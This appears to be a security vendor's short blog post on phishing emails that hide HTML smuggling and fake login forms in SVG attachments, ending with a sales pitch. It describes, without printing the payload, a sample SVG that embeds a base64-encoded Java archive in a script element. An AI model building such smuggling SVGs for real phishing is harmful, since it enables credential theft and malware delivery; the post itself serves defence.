Phishing emails increasingly use SVG attachments for HTML smuggling to evade detection

Cybercriminals are increasingly leveraging Scalable Vector Graphics (SVG) attachments in phishing emails to bypass detection mechanisms. Unlike traditional image formats like JPG or PNG, which consist of pixel grids, SVG files use XML-based text to define images through lines, shapes, and text. This text-based structure allows SVG files to incorporate HTML elements and execute JavaScript, enabling attackers to embed phishing forms or malicious scripts directly within the image file.

[Excerpt from a malicious SVG sample: a <script type="application/ecmascript"> element whose CDATA body assigns a base64-encoded data:application/java-archive URI to a JavaScript constant; the encoded payload blob is omitted here.]

For instance, an SVG file can be crafted to display a seemingly legitimate login form that, when interacted with, captures user credentials for malicious purposes. The versatility of SVGs in rendering complex graphics and executing scripts makes them an attractive tool for threat actors aiming to evade traditional email security filters, which may not scrutinize SVG files as rigorously as other attachment types.

To mitigate the risks associated with SVG-based phishing attacks, it is crucial to implement robust email filtering systems capable of analyzing the content of SVG files for malicious code. Additionally, educating users about the potential dangers of unexpected email attachments and encouraging cautious behavior when encountering unfamiliar file types can help reduce the likelihood of successful phishing attempts.

Sorb Security is capable of defending against such attacks. Please reach out to sales@sorbsecurity.com for a PoV.